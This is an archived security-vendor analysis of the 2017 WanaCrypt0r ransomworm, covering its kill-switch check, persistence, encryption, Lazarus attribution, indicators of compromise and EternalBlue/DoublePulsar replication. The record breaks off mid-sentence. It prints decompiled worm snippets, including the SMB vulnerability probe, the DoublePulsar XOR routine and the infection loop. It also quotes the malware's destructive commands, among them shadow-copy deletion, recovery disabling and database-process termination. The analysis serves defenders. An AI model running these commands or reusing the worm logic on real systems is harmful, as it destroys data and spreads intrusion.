{ "id": "31139fec-7b8d-4089-9645-12ee9956215f", "created_at": "2026-04-06T00:06:28.526256Z", "updated_at": "2026-04-10T13:12:47.982585Z", "deleted_at": null, "sha1_hash": "e7e88a7a81f76e016b0d967a93062cb9021a01a0", "title": "WanaCrypt0r Ransomworm", "llm_title": "", "authors": "", "file_creation_date": "0001-01-01T00:00:00Z", "file_modification_date": "0001-01-01T00:00:00Z", "file_size": 1053473, "plain_text": "WanaCrypt0r Ransomworm\r\nArchived: 2026-04-05 13:44:24 UTC\r\nWritten by Sergei Shevchenko and Adrian Nish\r\nBACKGROUND\r\nSince the release of the ETERNALBLUE exploit by ‘The Shadow Brokers’ last month security researchers have\r\nbeen watching for a mass attack on global networks. This came on Friday 12th May when it was bundled with\r\nransomware called WanaCrypt0r and let loose. Initial reports of attacks were highlighted by Telefonica in Spain\r\nbut the malware quickly spread to networks in the UK where the National Health Service (NHS) was impacted,\r\nfollowed by many other networks across the world.\r\nThe infographic below illustrates the key components of the WanaCrypt0r ransomware. This is described in\r\nfurther detail in subsequent sections of this report along with initial clues on attribution.\r\nANALYSIS: Initial Vector\r\nThe initial infection vector is still unknown. Reports by some of phishing emails have been dismissed by other\r\nresearchers as relevant only to a different (unrelated) ransomware campaign, called Jaff.\r\nThere is also a working theory that initial compromise may have come from SMB shares exposed to the public\r\ninternet. Results from Shodan show over 1.5 million devices with port 445 open – the attacker could have infected\r\nhttps://baesystemsai.blogspot.de/2017/05/wanacrypt0r-ransomworm.html\r\nPage 1 of 22\n\nthose shares directly.\r\nThe Dropper/Worm\r\nThe infection starts from a 3.6Mb executable file named mssecsvc.exe or lhdfrgui.exe . Depending on how\r\nit's executed, it can function as a dropper or as a worm.\r\nWhen run, the executable first checks if it can connect to the following URL:\r\nhttp://www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea[.]com\r\nThe connection is checked with the WinINet functions, shown below:\r\n01 qmemcpy(\u0026szUrl,\r\n02\"http://www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea[.]com\",\r\n0357u);\r\n04 h1=InternetOpenA(0,INTERNET_OPEN_TYPE_DIRECT,0,0,0);\r\n05 h2=InternetOpenUrlA(h1,\u0026szUrl,0,0,\r\n06INTERNET_FLAG_RELOAD|INTERNET_FLAG_NO_CACHE_WRITE,\r\n070);\r\n08 if(h2)\r\n09 {\r\n10InternetCloseHandle(h1);//ifconnectionsucceeds,thenquit\r\n11InternetCloseHandle(h2);\r\n12result=0;\r\n13 }\r\n14 else\r\n15 {\r\n16InternetCloseHandle(h1);//ifconnectionfails\r\n17InternetCloseHandle(0);\r\n18PAYLOAD();//thencallthepayload\r\n19result=0;\r\n20 }\r\nhttps://baesystemsai.blogspot.de/2017/05/wanacrypt0r-ransomworm.html\r\nPage 2 of 22\n\n21 return\r\nresult;\r\nThat means that if the executable is unable to connect to the URL above, it will call the payload. Alternatively, it\r\nwill activate a payload on an air-gapped system, such as a system within a hospital network.\r\nIt is also worth noting that this connection is not proxy aware, therefore in an enterprise IT environment it is\r\nunlikely to be able to connect to the domain triggering the payload.\r\nIf the executable is run with no command line parameters, it will register and then run itself as a service:\r\nService name: \"mssecsvc2.0\"\r\nService Description: \"Microsoft Security Center (2.0) Service\"\r\nService executable: \"%ORIGINAL_NAME% -m security\"\r\nwhere %ORIGINAL_NAME% is the original name of the executable, such as mssecsvc.exe or lhdfrgui.exe .\r\nNext, it will start the created service. The payload of the executable will load its own resource called \"R/1831\" ,\r\nand save it as:\r\nThe original c:\\windows\\tasksche.exe file is renamed into c:\\windows\\qeriuwjhrf .\r\nFinally, the executable will execute the dropped resource as:\r\n\"c:\\windows\\tasksche.exe /i\"\r\nIf this executable is started as a service, its service handling procedure will invoke a network replication code,\r\nexplained below.\r\nEternalBlue Port\r\nSince the Shadow Brokers leaked the EquationGroup / NSA FuzzBunch software, a researcher with the handle\r\n@zerosum0x0 has reverse engineered the ETERNALBLUE SMBv1/SMBv2 exploit against Windows Server\r\n2008 R2 SP1 x64. This was released on 21st April 2017.\r\nAs @zerosum0x0 predicted:\r\n“Every major malware family, from botnets to ransomware to banking spyware, will eventually add the exploits in\r\nthe FuzzBunch toolkit to their arsenal. This payload is simply a mechanism to load more malware with full system\r\nprivileges... This is a jewel compared to the scraps that were given to Stuxnet. It comes in a more dangerous era\r\nthan the days of Conficker. Given the persistence of the missing MS08-067 patch, we could be in store for a\r\ndecade of breaches emanating from MS17-010 exploits. It is the perfect storm for one of the most damaging\r\nmalware infections in computing history.”\r\nThis work was further expanded on with an open-source project \"MS17-010 Windows SMB RCE\", developed by\r\nRiskSense Operations, and includes both a Metasploit scanner and a Python port.\r\nhttps://baesystemsai.blogspot.de/2017/05/wanacrypt0r-ransomworm.html\r\nPage 3 of 22\n\nOn 9th of May 2017, the Python port was further improved to \"Store original shellcode in binary, rather than\r\npython string representation\".\r\nIn order to \"Make it faster\", the shellcode was now declared as binary, further lowering the barrier of porting it\r\ninto C++ code.\r\nIt appears that the ransomware took advantage of the published Python source, along with the shellcode binaries –\r\nthe SMB structures found in the ransomware are identical to the published ones (e.g. the “Exploits” section of this\r\nproject was used to infect remote hosts with DOUBLEPULSAR backdoor). The published raw SMB packets\r\nappear to be copy-pasted into C++ code, and then recompiled using ported blobs – most likely without even\r\nunderstanding how the EternalBlue SMBv1/SMBv2 exploit actually works.\r\nA detailed description of the network replication and worm functionality is described in Appendix B.\r\nThe Payload\r\nThe payload is a 3.4Mb file called tasksche.exe , created from the worm's resource \"1831\" . Such a large size\r\nis explained by the bundled TOR executables along with other tools and configuration files.\r\nInternal name of this executable is diskpart.exe .\r\nThis file contains another embedded resource in it, named as \"XIA/2058\" . This resource is a ZIP file.\r\nIf the file detects it was executed without the \"/i\" switch – that is, it was not executed by the worm, it will\r\nregister itself as a service to provide itself with a persistence mechanism that does not require the worm.\r\nFor that, it will first generate a pseudo-random name that is derived from the current computer name. For\r\nexample:\r\nNext, it will create read-only directories, and copy itself into those directories, such as:\r\n  •   c:\\ProgramData\\%RANDOM_NAME%\\%EXE_NAME%\r\n  •   c:\\Intel\\%RANDOM_NAME%\\%EXE_NAME%\r\nwhere %RANDOM_NAME% is the previously generated pseudo-random name, and %EXE_NAME% is the name of its own\r\nexecutable.\r\nFor example:\r\n  •   c:\\ProgramData\\tdyhddeaprj852\\tasksche.exe\r\n  •   c:\\Intel\\tdyhddeaprj852\\tasksche.exe\r\nNext, it will create a new service:\r\nhttps://baesystemsai.blogspot.de/2017/05/wanacrypt0r-ransomworm.html\r\nPage 4 of 22\n\nService name: %RANDOM_NAME% Service Description: %RANDOM_NAME% Service executable: \"cmd.exe /c\r\n%FULL_PATH_FILENAME%\"\r\nwhere %FULL_PATH_FILENAME% is the full path filename of the malicious executable.\r\nFollowing this, it starts the service or directly runs the newly created executable as:\r\n\"cmd.exe /c %FULL_PATH_FILENAME%\"\r\nTo make sure there is only one copy of the executable running, it relies on a mutex named as:\r\n\"Global\\MsWinZonesCacheCounterMutexA\"\r\nEncryption Phase\r\nThe malware then proceeds to its file encryption phase.\r\nIt will register its working directory in the registry value:\r\nHKLM\\SOFTWARE\\WanaCrypt0r\\wd: \"%WORKING_DIR%\"\r\nNext, it will unzip its embedded resource \"XIA/2058\" into the working directory, using ZIP password\r\n\"WNcry@2ol7\" .\r\nThis will create a number of the files, such as a command line TOR executable, required libraries, ransom\r\nmessages in various languages, and other tools:\r\n  •   b.wnry – a bitmap image with the ransom note in it\r\n  •   c.wnry – binary configuration file\r\n  •   r.wnry – a text file with the ransom note in it\r\n  •   s.wnry – a ZIP file with command line TOR executable, required libraries\r\n  •   t.wnry – encrypted ransomware DLL\r\n  •   taskdl.exe – an executable that enumerates and deletes temp files on each drive, looking for files\r\nwith .WNCRYT extension in %DRIVE%:\\$RECYCLE and %TEMP% directories\r\n  •   taskse.exe – an executable that starts @WanaDecryptor@.exe\r\n  •   u.wnry – ransomware’s decryptor executable that opens a GUI with a ransom note in it\r\n  •   msg\\m_*.wnry – a directory with ransom notes in different languages\r\nIt will then read the unzipped configuration file c.wnry – this file contains the following list of .onion\r\ndomains:\r\ngx7ekbenv2riucmf.onion\r\n57g7spgrzlojinas.onion\r\nxxlvbrloxvriy2c5.onion\r\n76jdd2ir2embyv47.onion\r\ncwwnhwhlz52maqm7.onion\r\nhttps://baesystemsai.blogspot.de/2017/05/wanacrypt0r-ransomworm.html\r\nPage 5 of 22\n\nNext, it picks up a random Bitcoin address out of three hard-coded ones – the list below shows the balances at the\r\ntime of analysis:\r\n13AM4VW2dhxYgXeQepoHkHSQuy6NgaEb94 - 15.13562354 BTC = $26410\r\n12t9YDPgwueZ9NyMgw519p7AA8isjr6SMw - 13.78022431 BTC = $24045\r\n115p7UMMngoj1pMvkpHijcRdfJNXj6LrLn - 5.98851225 BTC = $17361\r\nHence, the total amount of the collected ransom at the time of writing is ~USD$68K.\r\nThe selected Bitcoin address is then saved back into c.wnry file. Thus, the purpose of this file is to store\r\nconfiguration.\r\nNext, the ransomware runs the following commands to assign 'hidden' attribute to all of its files and to allow full\r\naccess rights for all users:\r\n\"attrib +h .\"\r\n\"icacls . /grant Everyone:F /T /C /Q\"\r\nIt then imports a 2048-bit public RSA key from a hard-coded 1,172-byte blob, stored within the executable. Next,\r\nit reads the unzipped resource file t.wnry that starts from a \"WANACRY!\" marker, and decrypts an AES key from\r\nhere, using an RSA public key.\r\nThe recovered AES key is then used to decrypt the rest of t.wnry file contents, using AES-128 (CBC).\r\nThe blob decrypted from t.wnry turns out to be a PE-file - the malware parses its PE header, then dynamically\r\nloads into a newly allocated memory, and calls its entry point.\r\nThis PE file is a DLL, and the called entry point corresponds to its DllEntryPoint() export.\r\nInternal name of this DLL is kbdlv.dll . The malware locates and then calls its export TaskStart().\r\nhttps://baesystemsai.blogspot.de/2017/05/wanacrypt0r-ransomworm.html\r\nPage 6 of 22\n\nThe Ransomware DLL\r\nThe main DLL module of the ransomware has an internal name kbdlv.dll . Its export TaskStart() is called to\r\ninvoke the ransomware’s file encryption logic.\r\nThe DLL first creates a mutex \"MsWinZonesCacheCounterMutexA\" to make sure there is only one copy of\r\nransomware activated. Next, it reads c.wnry - a configuration file that stores the list of TOR services.\r\nThe ransomware will attempt to terminate a number of processes, such as SQL server and MS Exchange server, by\r\nrunning commands:\r\ntaskkill.exe /f /im mysqld.exe\r\ntaskkill.exe /f /im sqlwriter.exe\r\ntaskkill.exe /f /im sqlserver.exe\r\ntaskkill.exe /f /im MSExchange*\r\ntaskkill.exe /f /im Microsoft.Exchange.*\r\nIt will then spawn a number of threads, including a file encryption thread.\r\nIt will not attempt to encrypt files within directories that contain following strings in their names:\r\n  •   \\Intel\r\n  •   \\ProgramData\r\n  •   \\WINDOWS\r\n  •   \\Program Files\r\n  •   \\Program Files (x86)\r\n  •   \\AppData\\Local\\Temp\r\n  •   \\Local Settings\\Temp\r\n  •   This folder protects against ransomware. Modifying it will reduce protection\r\n  •   Temporary Internet Files\r\n  •   Content.IE5\r\nBefore the encrypted files are written, the ransomware checks the free disk space with GetDiskFreeSpaceExW() to\r\nmake sure it does not run out of free space.\r\nFinally, the DLL creates a copy of the previously unzipped file u.wnry , saving and then running it as\r\n@WanaDecryptor@.exe.\r\nThe Ransomware EXE\r\nThe EXE module @WanaDecryptor@.exe is run by the DLL (a copy of the previously unzipped file u.wnry ). It\r\nis a GUI application with the window name being \"Wana Decrypt0r 2.0\" .\r\nTo delete Windows shadow copies, it runs the commands:\r\ncmd.exe /c vssadmin delete shadows /all /quiet \u0026\r\nwmic shadowcopy delete \u0026\r\nhttps://baesystemsai.blogspot.de/2017/05/wanacrypt0r-ransomworm.html\r\nPage 7 of 22\n\nbcdedit /set {default} bootstatuspolicy ignoreallfailures \u0026\r\nbcdedit /set {default} recoveryenabled no \u0026\r\nwbadmin delete catalog -quiet\r\nThis executable will connect to C\u0026C via TOR .onion domains, in order to anonymise its C\u0026C traffic.\r\nOnce the ransom is paid, the executable is able to check the status of the payment, and allow file decryption.\r\nAttribution\r\nThe WanaCrypt0r ransomware released on 12th May is not the only version. Earlier this year, there was another\r\nversion released (example MD5: 9c7c7149387a1c79679a87dd1ba755bc ).\r\nThe older version has a timestamp of 9th February 2017, and was first submitted to VirusTotal on 10th February\r\n2017.\r\nSimilar to the latest version, it also relies on external files, only the used extension is .wry instead of .wnry :\r\n  •   n.wry\r\n  •   cg.wry\r\n  •   t1.wry\r\n  •   t2.wry\r\nThe latest version downloads a TOR client from:\r\nhttps://dist.torproject.org/torbrowser/6.5.1/tor-win32-0.2.9.10.zip\r\nThe older version downloads a TOR client from:\r\nhttps://www.torproject.org/dist/torbrowser/6.0.8/tor-win32-0.2.8.11.zip\r\nBoth old and new version extract the ZIP file into the TaskData folder.\r\nIt's worth noting that the older variant of ransomware also attempted to replicate across \\\\%IP%\\ipc$ network\r\nshares. Hence, the idea of the network replication was brewing in the attackers' minds long before 'The Shadow\r\nBrokers' release.\r\nThe older version of WanaCrypt0r ransomware relies on a function that generates a random buffer, using an\r\ninternal table that consists of 75 WORDs:\r\nhttps://baesystemsai.blogspot.de/2017/05/wanacrypt0r-ransomworm.html\r\nPage 8 of 22\n\nThe implementation of this function is very unique - it cannot be found in any legitimate software. The only other\r\nsample where this function can also be found (almost identical, but with minor tweaks) is a sample of Contopee\r\nbackdoor (MD5: ac21c8ad899727137c4b94458d7aa8d8 ), first submitted to VirusTotal on 15th August 2015.\r\nThis code overlap was first noticed and tweeted by Google researcher Neel Mehta. This was quickly followed up\r\non by Kaspersky Labs in a blogpost.\r\nThe Contopee backdoor sample uses this function as part of its communication protocol with the C\u0026C server. This\r\nbackdoor family is a tool from the Lazarus threat actors.\r\nhttps://baesystemsai.blogspot.de/2017/05/wanacrypt0r-ransomworm.html\r\nPage 9 of 22\n\nThe re-use of code is a characteristic of the Lazarus group we noted in our report last year on attacks against\r\nSWIFT systems. This re-use is at the source-code level, providing strong evidence of common development\r\nenvironment.\r\nThis, along with other overlaps with Lazarus’ previous campaigns is described below:\r\nCharacteristic Lazarus code example WanaCrypt0r example\r\nRandom buffer\r\ngenerator\r\nfunction\r\nAugust 2015\r\nContopee backdoor:\r\nac21c8ad899727137c4b94458d7aa8d8\r\nJanuary 2017\r\nWanaCrypt0r:\r\n9c7c7149387a1c79679a87dd1ba755bc\r\nCode / Compiler C++ / Visual Studio 6.0 C++ / Visual Studio 6.0\r\n‘leetspeak’\r\ny0uar3@s!llyid!07\r\nReferenced in US-CERT alert following\r\nSONY attack.\r\nWANACRY!\r\nWNcry@2ol7\r\nhttps://baesystemsai.blogspot.de/2017/05/wanacrypt0r-ransomworm.html\r\nPage 10 of 22\n\nCryptoCurrency\r\nLazarus has targeted Bitcoin related\r\ncompanies in recent months – possibly\r\nlooking for ways to steal/launder funds.\r\nA watering-hole (same as described in our\r\nblog) was setup in February on a popular\r\nBitcoin website.\r\nWanaCrypt0r uses Bitcoin addresses to\r\nreceive ransom payments.\r\nAs noted in our attribution post last year, use of Visual Studio 6.0 is not a significant observation on its own –\r\nhowever, this development environment dates from 1998 and is rarely used by malware coders. Nonetheless, it has\r\nbeen seen repeatedly with Lazarus attacks.\r\nCONCLUSIONS\r\nCoupling an SMB worm to ransomware has created a highly effective threat – albeit one which wreaks havoc for\r\nrelatively little monetary gain. Even though $68K may represent a modest profit for the attackers, moving the\r\nmoney from those bitcoin wallets will attract significant attention from law-enforcement and could identify their\r\nmoney-laundering networks. It is very likely they will not get their hands on any money once this is all over.\r\nWhilst the SMB worm code has been copy/pasted from elsewhere, the ransomware author is clearly an\r\nexperienced malware-dev. They include checks such as filepaths for anti-ransomware products to avoid detection\r\nof their operation. There are mistakes though, such as the “kill-switch” which has been widely discussed.\r\nAssuming they used the Python port of code released on 9th May, it implies a very short turn around between\r\ndevelopment and attack; it is therefore possible the worm got loose whilst the code was still in testing. Either way,\r\nthe attackers will learn from this campaign, and may return with updated code whilst vulnerabilities remain\r\nunpatched.\r\nThe linkages to the Lazarus campaign are tantalising clues as to who may be ultimately behind this. Following on\r\nfrom last year's attacks on SWIFT systems and this year's attacks on banks in Poland \u0026 Mexico they continue to\r\ndemonstrate that they are a considerable menace to network defenders. Understanding their tools, techniques and\r\nprocedures is challenging given the shifting nature of attacks seen, however deserves maximum focus and co-operation across the security community.\r\nThe biggest lesson to be learned from this attack though is the on-going challenge which organisations running\r\ncritical infrastructure face with patching. This isn’t the first case of self-propagating malware impacting healthcare\r\nnetworks we’ve investigated; indeed this reminds us a lot of the QBot/Qakbot episode last year. Then, as now,\r\nhospitals are exposed by running on out-of-date systems and with minimal resources to spend on security. The\r\nWanaCrypt0r campaign has brought this to international attention – how to fix the problem going forward will\r\nneed swift debate among technology experts and policy makers to avert similar crises in future.\r\nRECOMMENDATIONS\r\nhttps://baesystemsai.blogspot.de/2017/05/wanacrypt0r-ransomworm.html\r\nPage 11 of 22\n\n•  Install patch MS17-010 as a matter of urgency. For out of support operating systems such as XP, Win8\r\nand Server 2003 apply the out of band patch.\r\n  •  Add in the following SNORT Rules to IDS devices:\r\nhttp://doc.emergingthreats.net/bin/view/Main/2024218\r\n  •  Block all outgoing connections on port 137,139, 445 and 3389 (i.e. internal to external) to stop the\r\nworm spreading externally.\r\n  •  Block all incoming connections on ports 137,139, 445 and 3389 (i.e external to internal) to stop the\r\nworm coming into the network.\r\n  •  Consider blocking connections on port 445 (SMB shares) internally if not business critical until the\r\nworm has subsided.\r\n  •  Ensure that connections to the domain: www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea[.]com are\r\npermitted, This is site is reported to act as a kill switch, for some variants, preventing encryption.\r\nConnectivity can be tested with the following python script.\r\nWe also suggest noting the recommendations from:\r\n  NCSC-UK: https://www.ncsc.gov.uk/news/latest-statement-international-ransomware-cyber-attack-0\r\n  CIRCL: https://www.circl.lu/pub/tr-41/\r\n  Microsoft: blogs.technet.microsoft.com/mmpc/2017/05/12/wannacrypt-ransomware-worm-targets-out-of-date-systems/\r\nAPPENDIX A – Indictors of compromise\r\nC\u0026C Domain\r\ngx7ekbenv2riucmf[.]onion\r\n57g7spgrzlojinas[.]onion\r\nxxlvbrloxvriy2c5[.]onion\r\n76jdd2ir2embyv47[.]onion\r\ncwwnhwhlz52maqm7[.]onion\r\niuqerfsodp9ifjaposdfjhgosurijfaewrwergwea[.]com\r\nMD5 Hashes\r\n4fef5e34143e646dbf9907c4374276f5\r\n509c41ec97bb81b0567b059aa2f50fe8\r\n7bf2b57f2a205768755c07f238fb32cc\r\nhttps://baesystemsai.blogspot.de/2017/05/wanacrypt0r-ransomworm.html\r\nPage 12 of 22\n\n7f7ccaa16fb15eb1c7399d422f8363e8\r\n8495400f199ac77853c53b5a3f278f3e\r\n84c82835a5d21bbcf75a61706d8ab549\r\ndb349b97c37d22f5ea1d1841e3c89eb4\r\nf107a717f76f4f910ae9cb4dc5290594\r\nAPPENDIX B – The Network Replicator\r\nThe worm replicates across the network using two threads: the first one provides replication across the local\r\nnetwork, and the second one - across random IP ranges, thus affecting external addresses (such as honeypots or\r\nother exposed SMB shares).\r\nTo replicate across internal network, the worm first calls GetAdaptersInfo() to obtain network configuration for\r\neach network adapter associated with the system.\r\nThe network configuration allows it to use current IP address and mask to build a list of local IP addresses.\r\nFor example, if the local IP address is 192.168.78.132 , and the subnet mask is 255.255.255.0 , the worm may\r\nbuild a list of 254 IP addresses that are displayed below in their binary format, such as 014EA8C0\r\n( \"192.168.78.1\" ), 024EA8C0 ( \"192.168.78.2\" ), and up to FE4EA8C0 ( \"192.168.78.254\" ):\r\nNOTE: the constructed list is trailed with the BAADF00D markers.\r\nThis list is then passed to a newly spawned thread to enumerate it, and the worm will then attempt to replicate to\r\neach target in the list.\r\nThe second network replication thread is spawned each 2 seconds up to 128 times. Each instance of this thread\r\nwill generate a random IP consisting of 4 octets:\r\nhttps://baesystemsai.blogspot.de/2017/05/wanacrypt0r-ransomworm.html\r\nPage 13 of 22\n\nEach octet is a random value from 0 to 255, generated using CryptGenRandom() API - a cryptographically secure\r\npseudorandom number generator.\r\nFirst octet IP1 cannot be set to 127 , 224 , or 225 . If the worm is able to connect to a target with IP address\r\nIP1.IP2.IP3.IP4 over port 445 , it will then enumerate 255 IP addresses from IP1.IP2.IP3.1 to\r\nIP1.IP2.IP3.255 . The worm will attempt to replicate to each enumerated target.\r\nThis thread is spawned 128 times - the round number is passed to the thread as an argument, so it is aware about\r\nthe current round of its own execution. The thread uses it along with an internal timer (using 20 and 40 minute\r\nintervals) to define the logic of regeneration of IP1 and IP2 parts of the random IPs.\r\nBoth threads rely on the same network propagation mechanism: for each target IP, the worm first attempts to\r\nconnect on port 445 and submit it two SMB requests, with an attempt to establish if the MS17_010 SMB\r\nVulnerability exists:\r\n  •   negotiate_proto_request\r\n  •   session_setup_andx_request\r\nThe code below shows how these packets are submitted:\r\n01name.sa_family=2;\r\n02*(_DWORD*)\u0026name.sa_data[2]=inet_addr(cp);\r\n03*(_WORD*)\u0026name.sa_data[0]=htons(hostshort);\r\n04hSocket=socket(2,1,0);\r\n05__hSocket=hSocket;\r\n06if(hSocket!=-1)\r\n07{\r\n08if(connect(hSocket,\u0026name,16)!=-1\r\n09\u0026\u0026send(__hSocket,negotiate_proto_request,88,0)!=-1\r\n10\u0026\u0026recv(__hSocket,\u0026buf,1024,0)!=-1\r\n11\u0026\u0026send(__hSocket,session_setup_andx_request,103,0)!=-1\r\n12\u0026\u0026recv(__hSocket,\u0026buf,1024,0)!=-1)\r\nOn a network level, WireShark recognises these two packets as Negotiate Protocol Request and Session Setup\r\nAndX Request.\r\nNegotiate Protocol Request:\r\nhttps://baesystemsai.blogspot.de/2017/05/wanacrypt0r-ransomworm.html\r\nPage 14 of 22\n\nSession Setup AndX Request:\r\nThe disassembled source of the worm shows how the Negotiate Protocol Request is built:\r\nThe disassembled source shows the Session Setup AndX Request (only the end of it is shown):\r\nhttps://baesystemsai.blogspot.de/2017/05/wanacrypt0r-ransomworm.html\r\nPage 15 of 22\n\nThe Session Setup AndX Request will get a response, and the code parses it to extract the native_os field from\r\nit.\r\nFollowing this, the worm composes an IPC share name such as:\r\nNext, the ransomware submits two other SMB requests:\r\n  •   tree_connect_andx_request\r\n  •   peeknamedpipe_request\r\nFirst, the Tree Connect AndX Request:\r\nOnce the host responds, the code will read tree_id , process_id , user_id , and multiplex_id , in order\r\nconstruct a new SMB request. In that new request, the following placeholders within request templates will be\r\nreplaced with the extracted values:\r\n  •   __TREEID__PLACEHOLDER__\r\n  •   __USERID__PLACEHOLDER__\r\n  •   __TREEPATH_REPLACE__\r\nThe PeekNamedPipe Request is then submitted, recognised in WireShark as:\r\nThe SMB header extracted from the received response is then parsed to see if nt_status contained in it equals\r\n0x0C000205 . Here is how the malware parses the four bytes of such status (bytes 05 , 02 , 00 , 0C ):\r\nhttps://baesystemsai.blogspot.de/2017/05/wanacrypt0r-ransomworm.html\r\nPage 16 of 22\n\n01 if\r\n(send(__hSocket,peeknamedpipe_request,78,0)!=-1//ifsent\r\n02\u0026\u0026recv(__hSocket,\u0026buf,1024,0)!=-1//andrecv()isOk\r\n03\u0026\u0026nt_status_0==5//andnt_statusbyte#0=05\r\n04\u0026\u0026nt_status_1==2//andnt_statusbyte#1=02\r\n05\u0026\u0026!nt_status_2//andnt_statusbyte#2=00\r\n06\u0026\u0026nt_status_3==0xC0u)//andnt_statusbyte#3=0C\r\n07{//ifnt_status==0x0C000205\r\n08closesocket(__hSocket);\r\n09return1;//returnTRUE,hostisvulnerabletoMS17-010\r\n10}\r\n11 ...\r\n12 return0;//returnFALSE–thehostisNOTvulnerable\r\nIf the host is vulnerable to MS17-010, the worm waits for three seconds and then checks if it is already infected\r\nwith DOUBLEPULSAR – in order to replicate itself, it needs an active DOUBLEPULSAR backdoor to be\r\ninstalled at the host.\r\nIn order to check that, it builds and then submits SMB Trans2 Request or trans2_request .\r\nAs seen below, the subcommand field within trans2_request request is set to SESSION_SETUP , which is a\r\ncovert beacon request to the DOUBLEPULSAR backdoor:\r\nIf the host is infected with DOUBLEPULSAR, the response will contain \"Multiplex ID\" set to 81 ( 0x51 ).\r\nHere, the worm sends trans2_request request, and checks if multiplex_id equals 0x51 :\r\n01 if(send(hSocket,trans2_request,82,0)!=-1//ifsend()Ok\r\n02\u0026\u0026recv(hSocket,\u0026buf,1024,0)!=-1//andrecv()Ok\r\n03\u0026\u0026multiplex_id==0x51)//andDoublePulsarisactive\r\n04 ...\r\nhttps://baesystemsai.blogspot.de/2017/05/wanacrypt0r-ransomworm.html\r\nPage 17 of 22\n\n05\r\nreturn1;//returnTRUE,isbackdoored\r\nIf the scanned host is infected with DOUBLEPULSAR, the worm will calculate an XOR key from the SMB’s\r\nSignature1 field ( sig ):\r\n01 unsignedintcalculate_doublepulsar_xor_key(unsignedintsig)\r\n02 {\r\n03return2*sig^((((sig\u003e\u003e16)|sig\u00260xFF0000)\u003e\u003e8)|\r\n04(((sig\u003c\u003c16)|sig\u00260xFF00)\u003c\u003c8));\r\n05 }\r\nThis XOR key will later be used as a basic stream cipher to encrypt the payload submitted over SMB:\r\n01 intxor_payload(intxor_key,intbuf,intsize)\r\n02 {\r\n03inti;\r\n04char__xor_key[5];\r\n05i=0;\r\n06*\u0026__xor_key[1]=0;\r\n07*__xor_key=xor_key;\r\n08if(size\u003c=0)\r\n09return0;\r\n10do\r\n11{\r\n12*(i+buf)^=__xor_key[i%4];\r\n13++i;\r\n14}\r\n15while(i\u003csize);\r\n16return0;\r\n17 }\r\nhttps://baesystemsai.blogspot.de/2017/05/wanacrypt0r-ransomworm.html\r\nPage 18 of 22\n\nThe worm next constructs a new SMB packet. The data contained in the packet will contain malicious shellcode.\r\nFor example, if the target is x64, the shellcode will first walk backwards to find ntoskrnl.exe in kernel\r\nmemory:\r\nNext, it parses ntoskrnl.exe ’s export table, and dynamically obtains addresses for a number of its exports – the\r\nexports are found by hashes, a common approach used in shellcode. The hash calculation function is reconstructed\r\nbelow:\r\n01 __int64get_name_hash(_BYTE*arg_name)\r\n02 {\r\n03_BYTE*name;\r\n04inti;\r\n05__int64hash;\r\n06name=arg_name;\r\n07for(i=0;;i=(unsigned__int8)*name+++(_DWORD)hash)\r\n08{\r\n09hash=(unsignedint)(127*i);\r\n10if(!*name)\r\n11break;\r\n12}\r\n13returnhash;\r\n14 }\r\nhttps://baesystemsai.blogspot.de/2017/05/wanacrypt0r-ransomworm.html\r\nPage 19 of 22\n\nFor example, a hash of 3E1481DFh corresponds to PsLookupProcessByProcessID(), as explained in an article\r\nfrom Countercept.\r\nNOTE: the 32-bit version of the code is identical in its functionality to its x64 version.\r\nThe shellcode will then use kernel’s ZwQuerySystemInformation() API to obtain the list of loaded drivers. Among\r\nthose drivers, it will be looking for a driver named Srv.sys – the driver is also found by its hash name:\r\nIt will then locate the Srv.sys driver’s .data section with the purpose of patching its\r\nSrvTransaction2DispatchTable – namely, placing a hook on its SrvTransactionNotImplemented() function,\r\nmaking sure that the shellcode is invoked as a hook handler, as explained by @zerosum0x0 .\r\nNext, the worm will construct a payload wrapped into a new SMB packet. For this, it will build a new DLL out of\r\nits own .data section. The internal name of the DLL is launcher.dll , and its only export is PlayGame(). The\r\nDLL is built using the worm's own file contents, and thus, the DLL is constructed as a thin wrapper around the\r\nworm's own executable.\r\nThe constructed DLL will be passed to the remote host along with the shellcode to load it up, via SMB, in 4Kb\r\nchunks, making sure each chunk is encrypted with the earlier derived XOR key.\r\nWith the hook in place, when such a payload packet arrives via SMB, it will be seen by Srv.sys (an SMB\r\ndriver) as an invalid SMB request. Therefore, it will call SrvTransactionNotImplemented() function from its own\r\ndispatch table. Since this function will be hooked, the shellcode with DLL injection logic will be invoked instead,\r\nthat in turn relies on KeInsertQueueApc().\r\nAs a result, the shellcode invoked as a hook handler will allocate memory in the executable region of memory,\r\nextract the received DLL in it, and run it in the userspace. This will lead to the execution of the ransomware on the\r\nremote host.\r\nThe newly built DLL launcher.dll delivered and executed at the host has very little functionality: when its\r\nPlayGame() export is called, it only loads up its own resource \"W/101\" , saves and then runs it under a fixed\r\nname:\r\nSince mssecsvc.exe is extracted from the DLL resource, which in turn is built by worm from its own body, it\r\nwill be equivalent to the worm executable itself.\r\nhttps://baesystemsai.blogspot.de/2017/05/wanacrypt0r-ransomworm.html\r\nPage 20 of 22\n\nIf it turns out that the remote host is not infected with DOUBLEPULSAR, the worm will attempt to infect the host\r\nwith DOUBLEPULSAR, using the same technique as ETERNALBLUE explained above. This attempt will be\r\nrepeated up to 5 times, with a 3 second interval between the attempts.\r\nA high-level description of the worm’s logic is shown below:\r\n01 if(IS_VULNERABLE_TO_MS17_010(\u0026target,445))\r\n02 {\r\n03i=0;\r\n04do\r\n05{\r\n06Sleep(3000);//waitfor3seconds\r\n07if(IS_BACKDOORED(\u0026target,1,445))//DoublePulsarinstalled?\r\n08break;//thenquittheloop\r\n09Sleep(3000);//otherwise,wait3sec.\r\n10INFECT_WITH_DOUBLEPULSAR(\u0026target,445);//installDoublePulsar\r\n11++i;\r\n12}\r\n13while(i\u003c5);//repeatupto5times\r\n14 }//..untilbackdoor-ed\r\n15 Sleep(3000);//waitfor3seconds\r\n16 if(IS_BACKDOORED(\u0026target,1,445))//finallybackdoor-ed?\r\n17SEND_PAYLOAD_RANSOMWARE(\u0026target,1,445);//sendWCryasDLL\r\n18 endthreadex(0,*\u0026target);//quitthethread\r\nAccording to this logic, if the host already has DOUBLEPULSAR backdoor installed on it, the worm will send it\r\nthe ransomware payload to execute it on the remote host. In turn, that instance of the ransomware will try to\r\nfurther replicate.\r\nIf the DOUBLEPULSAR backdoor is not installed on the remote host, the worm will try to install it. Only if the\r\nDOUBLEPULSAR backdoor is found to be installed on the remote host, only then the worm will try to replicate\r\nto it, via the 